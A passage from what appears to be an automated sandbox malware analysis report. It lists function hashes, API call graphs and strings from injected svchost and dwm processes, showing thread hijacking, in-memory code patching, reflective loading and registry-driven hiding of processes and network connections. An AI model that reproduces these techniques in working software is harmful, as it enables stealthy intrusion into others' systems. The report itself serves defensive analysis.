                                                              • Instruction Fuzzy Hash: 21614832F00B848AEB20DF65D48879D77A8FB45B88F084216EF4917B99DF38D199C701
                                                              Function 000002A661302330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: FileType
                                                              • String ID: \\.\pipe\
                                                              • API String ID: 3081899298-91387939
                                                              • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                              • Instruction ID: 8b65ca84562374e5dcff84955426101dcfa6df48021d4bc966f847153521bb2b
                                                              • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                              • Instruction Fuzzy Hash: 03519232B0478183E664DA39A65C3AAA6E9F386F41F4A0125DD5B33B59DF3DC50C87C2
                                                              Function 000002A6613126F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID: U
                                                              • API String ID: 442123175-4171548499
                                                              • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                              • Instruction ID: 435cc8df130a4e77d3710c788b2ddf4808abbc3271533ea666418ec5651f9c6f
                                                              • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                              • Instruction Fuzzy Hash: E941E672B14A8087DB20DF25E94D3AA77A4F38AB94F584021EE4E97784DF7CC405C741
                                                              Function 000002A6613094A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFileHeaderRaise
                                                              • String ID: csm
                                                              • API String ID: 2573137834-1018135373
                                                              • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                              • Instruction ID: b3e6afc7812eff5d23d9e2531ddbd3c8dde3b3595130f4102b15f64d21df9287
                                                              • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                              • Instruction Fuzzy Hash: 5A115832604B8082EB218F15E448359B7E8FB89F94F1D4220EE8E17B68DF3CC555CB40
                                                              Function 000002A6612D7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073099335.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a6612d0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: __std_exception_copy
                                                              • String ID: ierarchy Descriptor'$riptor at (
                                                              • API String ID: 592178966-758928094
                                                              • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                              • Instruction ID: 0f3f6b22aa811685f5e546128debed61f89d1e56892167602ce41c22e1950124
                                                              • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                              • Instruction Fuzzy Hash: FDE04F65B50B8591DB028F62E8482D833A89B5AB64B489122D95C07311EB3CD2EDC301
                                                              Function 000002A6612D73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073099335.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a6612d0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: __std_exception_copy
                                                              • String ID: Locator'$riptor at (
                                                              • API String ID: 592178966-4215709766
                                                              • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                              • Instruction ID: 93a3ced56bc647de6299b8a1905d2a6032edb69f7bc4320d41604ef82ca62c1f
                                                              • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                              • Instruction Fuzzy Hash: AEE08666F10B4481DF028F71E4441D87368EB5AF54B8C9122C95C07311EF3CD2E9C301
                                                              Function 000002A661301BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocFree
                                                              • String ID:
                                                              • API String ID: 756756679-0
                                                              • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                              • Instruction ID: 72cf71b4c8bcd0622c645fc165e77207b5f5e2b8a8cfb2fde8c47a753de635a3
                                                              • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                              • Instruction Fuzzy Hash: FC115B75B01B8482EA04DB66A80D22A73E9EB8AFC5F1C4028DE4E67765DFBCC446C341
                                                              Function 000002A661301268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocProcess
                                                              • String ID:
                                                              • API String ID: 1617791916-0
                                                              • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                              • Instruction ID: b5369b631e5731d7a483f2840394a7dd6d44661382897b8f9f01a4c4ceb7f075
                                                              • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                              • Instruction Fuzzy Hash: 18E065B5B01A4487EB088FA2D80D34A36E5FB8AF06F09C024CD0A07361DFFD8499CB91

                                                              Execution Graph

                                                              Execution Coverage:1.7%
                                                              Dynamic/Decrypted Code Coverage:95.3%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:127
                                                              Total number of Limit Nodes:16
                                                              execution_graph 14881 2baaedb3ab9 14886 2baaedb3a06 14881->14886 14882 2baaedb3a70 14883 2baaedb3a56 VirtualQuery 14883->14882 14883->14886 14884 2baaedb3a8a VirtualAlloc 14884->14882 14885 2baaedb3abb GetLastError 14884->14885 14885->14882 14885->14886 14886->14882 14886->14883 14886->14884 14887 2baaedb28c8 14889 2baaedb290e 14887->14889 14888 2baaedb2970 14889->14888 14891 2baaedb3844 14889->14891 14892 2baaedb3866 14891->14892 14893 2baaedb3851 StrCmpNIW 14891->14893 14892->14889 14893->14892 14894 2baaedb554d 14896 2baaedb5554 14894->14896 14895 2baaedb55bb 14896->14895 14897 2baaedb5637 VirtualProtect 14896->14897 14898 2baaedb5663 GetLastError 14897->14898 14899 2baaedb5671 14897->14899 14898->14899 14900 2baaedb1abc 14905 2baaedb1628 GetProcessHeap 14900->14905 14902 2baaedb1ad2 Sleep SleepEx 14903 2baaedb1acb 14902->14903 14903->14902 14904 2baaedb1598 StrCmpIW StrCmpW 14903->14904 14904->14903 14906 2baaedb1648 _invalid_parameter_noinfo 14905->14906 14950 2baaedb1268 GetProcessHeap 14906->14950 14908 2baaedb1650 14909 2baaedb1268 2 API calls 14908->14909 14910 2baaedb1661 14909->14910 14911 2baaedb1268 2 API calls 14910->14911 14912 2baaedb166a 14911->14912 14913 2baaedb1268 2 API calls 14912->14913 14914 2baaedb1673 14913->14914 14915 2baaedb168e RegOpenKeyExW 14914->14915 14916 2baaedb18a6 14915->14916 14917 2baaedb16c0 RegOpenKeyExW 14915->14917 14916->14903 14918 2baaedb16e9 14917->14918 14919 2baaedb16ff RegOpenKeyExW 14917->14919 14961 2baaedb12bc RegQueryInfoKeyW 14918->14961 14921 2baaedb1723 14919->14921 14922 2baaedb173a RegOpenKeyExW 14919->14922 14954 2baaedb104c RegQueryInfoKeyW 14921->14954 14923 2baaedb1775 RegOpenKeyExW 14922->14923 14924 2baaedb175e 14922->14924 14929 2baaedb1799 14923->14929 14930 2baaedb17b0 RegOpenKeyExW 14923->14930 14928 2baaedb12bc 13 API calls 14924->14928 14931 2baaedb176b RegCloseKey 14928->14931 14932 2baaedb12bc 13 API calls 14929->14932 14933 2baaedb17d4 14930->14933 14934 2baaedb17eb RegOpenKeyExW 14930->14934 14931->14923 14935 2baaedb17a6 RegCloseKey 14932->14935 14936 2baaedb12bc 13 API calls 14933->14936 14937 2baaedb1826 RegOpenKeyExW 14934->14937 14938 2baaedb180f 14934->14938 14935->14930 14941 2baaedb17e1 RegCloseKey 14936->14941 14939 2baaedb184a 14937->14939 14940 2baaedb1861 RegOpenKeyExW 14937->14940 14942 2baaedb104c 5 API calls 14938->14942 14944 2baaedb104c 5 API calls 14939->14944 14945 2baaedb1885 14940->14945 14946 2baaedb189c RegCloseKey 14940->14946 14941->14934 14943 2baaedb181c RegCloseKey 14942->14943 14943->14937 14947 2baaedb1857 RegCloseKey 14944->14947 14948 2baaedb104c 5 API calls 14945->14948 14946->14916 14947->14940 14949 2baaedb1892 RegCloseKey 14948->14949 14949->14946 14972 2baaedc6168 14950->14972 14952 2baaedb1283 GetProcessHeap 14953 2baaedb12ae _invalid_parameter_noinfo 14952->14953 14953->14908 14955 2baaedb11b5 RegCloseKey 14954->14955 14956 2baaedb10bf 14954->14956 14955->14922 14956->14955 14957 2baaedb10cf RegEnumValueW 14956->14957 14959 2baaedb1125 _invalid_parameter_noinfo 14957->14959 14958 2baaedb114e GetProcessHeap 14958->14959 14959->14955 14959->14957 14959->14958 14960 2baaedb116e GetProcessHeap HeapFree 14959->14960 14960->14959 14962 2baaedb1327 GetProcessHeap 14961->14962 14963 2baaedb148a RegCloseKey 14961->14963 14969 2baaedb133e _invalid_parameter_noinfo 14962->14969 14963->14919 14964 2baaedb1352 RegEnumValueW 14964->14969 14965 2baaedb1476 GetProcessHeap HeapFree 14965->14963 14967 2baaedb13d3 GetProcessHeap 14967->14969 14968 2baaedb141e lstrlenW GetProcessHeap 14968->14969 14969->14964 14969->14965 14969->14967 14969->14968 14970 2baaedb13f3 GetProcessHeap HeapFree 14969->14970 14971 2baaedb1443 StrCpyW 14969->14971 14973 2baaedb152c 14969->14973 14970->14968 14971->14969 14974 2baaedb157c 14973->14974 14977 2baaedb1546 14973->14977 14974->14969 14975 2baaedb1565 StrCmpW 14975->14977 14976 2baaedb155d StrCmpIW 14976->14977 14977->14974 14977->14975 14977->14976 14978 2baaed8273c 14979 2baaed8276a 14978->14979 14980 2baaed827c5 VirtualAlloc 14979->14980 14983 2baaed828d4 14979->14983 14982 2baaed827ec 14980->14982 14980->14983 14981 2baaed82858 LoadLibraryA 14981->14982 14982->14981 14982->14983 14984 2baaedb5cf0 14985 2baaedb5cfd 14984->14985 14986 2baaedb5d09 14985->14986 14993 2baaedb5e1a 14985->14993 14987 2baaedb5d3e 14986->14987 14988 2baaedb5d8d 14986->14988 14989 2baaedb5d66 SetThreadContext 14987->14989 14989->14988 14990 2baaedb5e41 VirtualProtect FlushInstructionCache 14990->14993 14991 2baaedb5efe 14992 2baaedb5f1e 14991->14992 15006 2baaedb43e0 14991->15006 15002 2baaedb4df0 GetCurrentProcess 14992->15002 14993->14990 14993->14991 14996 2baaedb5f23 14997 2baaedb5f77 14996->14997 14998 2baaedb5f37 ResumeThread 14996->14998 15010 2baaedb7940 14997->15010 14999 2baaedb5f6b 14998->14999 14999->14996 15001 2baaedb5fbf 15005 2baaedb4e0c 15002->15005 15003 2baaedb4e53 15003->14996 15004 2baaedb4e22 VirtualProtect FlushInstructionCache 15004->15005 15005->15003 15005->15004 15007 2baaedb43fc 15006->15007 15008 2baaedb445f 15007->15008 15009 2baaedb4412 VirtualFree 15007->15009 15008->14992 15009->15007 15011 2baaedb7949 15010->15011 15012 2baaedb7954 15011->15012 15013 2baaedb812c IsProcessorFeaturePresent 15011->15013 15012->15001 15014 2baaedb8144 15013->15014 15017 2baaedb8320 RtlCaptureContext 15014->15017 15016 2baaedb8157 15016->15001 15018 2baaedb833a RtlLookupFunctionEntry 15017->15018 15019 2baaedb8389 15018->15019 15020 2baaedb8350 RtlVirtualUnwind 15018->15020 15019->15016 15020->15018 15020->15019

                                                              Executed Functions

                                                              Function 000002BAAEDB1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                              • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                              • API String ID: 106492572-2879589442
                                                              • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                              • Instruction ID: 78f03bd58bd771501ec832d631cf30a0ec79085d488701881cd05dbf4638cb85
                                                              • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                              • Instruction Fuzzy Hash: 7171F536710A11C6EB119F76E89869933B4FB88F88F201125DE8E97B69EF38C454C761
                                                              Function 000002BAAEDB3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcessProtectVirtual$HandleModule
                                                              • String ID: wr
                                                              • API String ID: 1092925422-2678910430
                                                              • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                              • Instruction ID: c18b6d392aacd81c24e9439981193182f378ecf4105ae0e7c3b89df64e219d94
                                                              • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                              • Instruction Fuzzy Hash: 6611232A704B8182FB299B21E40866973B0FB88F85F640029EE9D07B94EF2DC505D726
                                                              Function 000002BAAEDB5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 59 2baaedb5b30-2baaedb5b57 60 2baaedb5b59-2baaedb5b68 59->60 61 2baaedb5b6b-2baaedb5b76 GetCurrentThreadId 59->61 60->61 62 2baaedb5b82-2baaedb5b89 61->62 63 2baaedb5b78-2baaedb5b7d 61->63 65 2baaedb5b9b-2baaedb5baf 62->65 66 2baaedb5b8b-2baaedb5b96 call 2baaedb5960 62->66 64 2baaedb5faf-2baaedb5fc6 call 2baaedb7940 63->64 67 2baaedb5bbe-2baaedb5bc4 65->67 66->64 70 2baaedb5c95-2baaedb5cb6 67->70 71 2baaedb5bca-2baaedb5bd3 67->71 77 2baaedb5cbc-2baaedb5cdc GetThreadContext 70->77 78 2baaedb5e1f-2baaedb5e30 call 2baaedb74bf 70->78 74 2baaedb5bd5-2baaedb5c18 call 2baaedb85c0 71->74 75 2baaedb5c1a-2baaedb5c8d call 2baaedb4510 call 2baaedb44b0 call 2baaedb4470 71->75 88 2baaedb5c90 74->88 75->88 81 2baaedb5ce2-2baaedb5d03 77->81 82 2baaedb5e1a 77->82 91 2baaedb5e35-2baaedb5e3b 78->91 81->82 90 2baaedb5d09-2baaedb5d12 81->90 82->78 88->67 94 2baaedb5d14-2baaedb5d25 90->94 95 2baaedb5d92-2baaedb5da3 90->95 96 2baaedb5e41-2baaedb5e98 VirtualProtect FlushInstructionCache 91->96 97 2baaedb5efe-2baaedb5f0e 91->97 101 2baaedb5d27-2baaedb5d3c 94->101 102 2baaedb5d8d 94->102 105 2baaedb5e15 95->105 106 2baaedb5da5-2baaedb5dc3 95->106 103 2baaedb5ec9-2baaedb5ef9 call 2baaedb78ac 96->103 104 2baaedb5e9a-2baaedb5ea4 96->104 99 2baaedb5f10-2baaedb5f17 97->99 100 2baaedb5f1e-2baaedb5f2a call 2baaedb4df0 97->100 99->100 108 2baaedb5f19 call 2baaedb43e0 99->108 120 2baaedb5f2f-2baaedb5f35 100->120 101->102 110 2baaedb5d3e-2baaedb5d88 call 2baaedb3970 SetThreadContext 101->110 102->105 103->91 104->103 111 2baaedb5ea6-2baaedb5ec1 call 2baaedb4390 104->111 106->105 112 2baaedb5dc5-2baaedb5e10 call 2baaedb3900 call 2baaedb74dd 106->112 108->100 110->102 111->103 112->105 124 2baaedb5f77-2baaedb5f95 120->124 125 2baaedb5f37-2baaedb5f75 ResumeThread call 2baaedb78ac 120->125 128 2baaedb5fa9 124->128 129 2baaedb5f97-2baaedb5fa6 124->129 125->120 128->64 129->128
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: Thread$Current$Context
                                                              • String ID:
                                                              • API String ID: 1666949209-0
                                                              • Opcode ID: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                              • Instruction ID: 31c15b6048437d5f0528e898c8b124e688204c93d2b6d14f8daac9b72cf6a32a
                                                              • Opcode Fuzzy Hash: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                              • Instruction Fuzzy Hash: BCD1AD76205B8886EB70DB06E49835AB7B1F7C8B84F200616EACD87BA5DF3CC551CB11
                                                              Function 000002BAAEDB50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 131 2baaedb50d0-2baaedb50fc 132 2baaedb510d-2baaedb5116 131->132 133 2baaedb50fe-2baaedb5106 131->133 134 2baaedb5118-2baaedb5120 132->134 135 2baaedb5127-2baaedb5130 132->135 133->132 134->135 136 2baaedb5132-2baaedb513a 135->136 137 2baaedb5141-2baaedb514a 135->137 136->137 138 2baaedb5156-2baaedb5161 GetCurrentThreadId 137->138 139 2baaedb514c-2baaedb5151 137->139 141 2baaedb5163-2baaedb5168 138->141 142 2baaedb516d-2baaedb5174 138->142 140 2baaedb56d3-2baaedb56da 139->140 141->140 143 2baaedb5176-2baaedb517c 142->143 144 2baaedb5181-2baaedb518a 142->144 143->140 145 2baaedb5196-2baaedb51a2 144->145 146 2baaedb518c-2baaedb5191 144->146 147 2baaedb51a4-2baaedb51c9 145->147 148 2baaedb51ce-2baaedb5225 call 2baaedb56e0 * 2 145->148 146->140 147->140 153 2baaedb5227-2baaedb522e 148->153 154 2baaedb523a-2baaedb5243 148->154 157 2baaedb5236 153->157 158 2baaedb5230 153->158 155 2baaedb5255-2baaedb525e 154->155 156 2baaedb5245-2baaedb5252 154->156 159 2baaedb5273-2baaedb5298 call 2baaedb7870 155->159 160 2baaedb5260-2baaedb5270 155->160 156->155 157->154 162 2baaedb52a6-2baaedb52aa 157->162 161 2baaedb52b0-2baaedb52b6 158->161 172 2baaedb532d-2baaedb5342 call 2baaedb3cc0 159->172 173 2baaedb529e 159->173 160->159 164 2baaedb52e5-2baaedb52eb 161->164 165 2baaedb52b8-2baaedb52d4 call 2baaedb4390 161->165 162->161 167 2baaedb5315-2baaedb5328 164->167 168 2baaedb52ed-2baaedb530c call 2baaedb78ac 164->168 165->164 175 2baaedb52d6-2baaedb52de 165->175 167->140 168->167 178 2baaedb5344-2baaedb534c 172->178 179 2baaedb5351-2baaedb535a 172->179 173->162 175->164 178->162 180 2baaedb536c-2baaedb53ba call 2baaedb8c60 179->180 181 2baaedb535c-2baaedb5369 179->181 184 2baaedb53c2-2baaedb53ca 180->184 181->180 185 2baaedb54d7-2baaedb54df 184->185 186 2baaedb53d0-2baaedb54bb call 2baaedb7440 184->186 187 2baaedb5523-2baaedb552b 185->187 188 2baaedb54e1-2baaedb54f4 call 2baaedb4590 185->188 198 2baaedb54bd 186->198 199 2baaedb54bf-2baaedb54ce call 2baaedb4060 186->199 191 2baaedb5537-2baaedb5546 187->191 192 2baaedb552d-2baaedb5535 187->192 202 2baaedb54f8-2baaedb5521 188->202 203 2baaedb54f6 188->203 196 2baaedb5548 191->196 197 2baaedb554f 191->197 192->191 195 2baaedb5554-2baaedb5561 192->195 200 2baaedb5564-2baaedb55b9 call 2baaedb85c0 195->200 201 2baaedb5563 195->201 196->197 197->195 198->185 207 2baaedb54d2 199->207 208 2baaedb54d0 199->208 210 2baaedb55c8-2baaedb5661 call 2baaedb4510 call 2baaedb4470 VirtualProtect 200->210 211 2baaedb55bb-2baaedb55c3 200->211 201->200 202->185 203->187 207->184 208->185 216 2baaedb5663-2baaedb5668 GetLastError 210->216 217 2baaedb5671-2baaedb56d1 210->217 216->217 217->140
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread
                                                              • String ID:
                                                              • API String ID: 2882836952-0
                                                              • Opcode ID: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                              • Instruction ID: 23740bbe660f02b17626632bc15792137b8cb4ce1fdb553318e7db32c27e2220
                                                              • Opcode Fuzzy Hash: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                              • Instruction Fuzzy Hash: 7A02C832219B848AEBA0DB55F49435AB7B1F3C4794F201516EACE87BA8EF7CC454CB11
                                                              Function 000002BAAEDB39E0 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: Virtual$AllocQuery
                                                              • String ID:
                                                              • API String ID: 31662377-0
                                                              • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                              • Instruction ID: 7a5abf18ac2a88b042ef8e55c3e5550eddf82e52636a0b843c26b095b24f542b
                                                              • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                              • Instruction Fuzzy Hash: DD311E22619B8485FB70DA15E05935EB7B4F388784F300525F6CE46BA8EFBDC580DB26
                                                              Function 000002BAAEDB328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                              • String ID:
                                                              • API String ID: 1683269324-0
                                                              • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                              • Instruction ID: 2ad3ca4f40750c63b75b568ed666e8e8af952458ac097145c83ebf84f034f196
                                                              • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                              • Instruction Fuzzy Hash: F011803061064082FB60AB35F84D35A33B4E794B44F745129E9CE81691FFB9C444D273
                                                              Function 000002BAAEDB4DF0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                              • String ID:
                                                              • API String ID: 3733156554-0
                                                              • Opcode ID: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                              • Instruction ID: dd3a5a768425e10e9621753640c41d4571e2c807aa16a46606a8960c8ce9cfd1
                                                              • Opcode Fuzzy Hash: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                              • Instruction Fuzzy Hash: FDF0DA26218B04C5E630DB05E49975EBBB0F388BD4F245216FACD47B69EB3CC691CB61
                                                              Function 000002BAAED8273C Relevance: 3.2, APIs: 2, Instructions: 187memorylibraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 265 2baaed8273c-2baaed827a4 call 2baaed829d4 * 4 274 2baaed829b2 265->274 275 2baaed827aa-2baaed827ad 265->275 277 2baaed829b4-2baaed829d0 274->277 275->274 276 2baaed827b3-2baaed827b6 275->276 276->274 278 2baaed827bc-2baaed827bf 276->278 278->274 279 2baaed827c5-2baaed827e6 VirtualAlloc 278->279 279->274 280 2baaed827ec-2baaed8280c 279->280 281 2baaed82838-2baaed8283f 280->281 282 2baaed8280e-2baaed82836 280->282 283 2baaed82845-2baaed82852 281->283 284 2baaed828df-2baaed828e6 281->284 282->281 282->282 283->284 287 2baaed82858-2baaed8286a LoadLibraryA 283->287 285 2baaed82992-2baaed829b0 284->285 286 2baaed828ec-2baaed82901 284->286 285->277 286->285 288 2baaed82907 286->288 289 2baaed828ca-2baaed828d2 287->289 290 2baaed8286c-2baaed82878 287->290 293 2baaed8290d-2baaed82921 288->293 289->287 291 2baaed828d4-2baaed828d9 289->291 294 2baaed828c5-2baaed828c8 290->294 291->284 296 2baaed82982-2baaed8298c 293->296 297 2baaed82923-2baaed82934 293->297 294->289 295 2baaed8287a-2baaed8287d 294->295 301 2baaed828a7-2baaed828b7 295->301 302 2baaed8287f-2baaed828a5 295->302 296->285 296->293 299 2baaed82936-2baaed8293d 297->299 300 2baaed8293f-2baaed82943 297->300 303 2baaed82970-2baaed82980 299->303 304 2baaed82945-2baaed8294b 300->304 305 2baaed8294d-2baaed82951 300->305 306 2baaed828ba-2baaed828c1 301->306 302->306 303->296 303->297 304->303 307 2baaed82963-2baaed82967 305->307 308 2baaed82953-2baaed82961 305->308 306->294 307->303 310 2baaed82969-2baaed8296c 307->310 308->303 310->303
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091263440.000002BAAED80000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaed80000_dwm.jbxd
                                                              Similarity
                                                              • API ID: AllocLibraryLoadVirtual
                                                              • String ID:
                                                              • API String ID: 3550616410-0
                                                              • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                              • Instruction ID: edf19ca3480a1da74097dc63c541a873bc22b60532e016aa43ba4ca51d0254c4
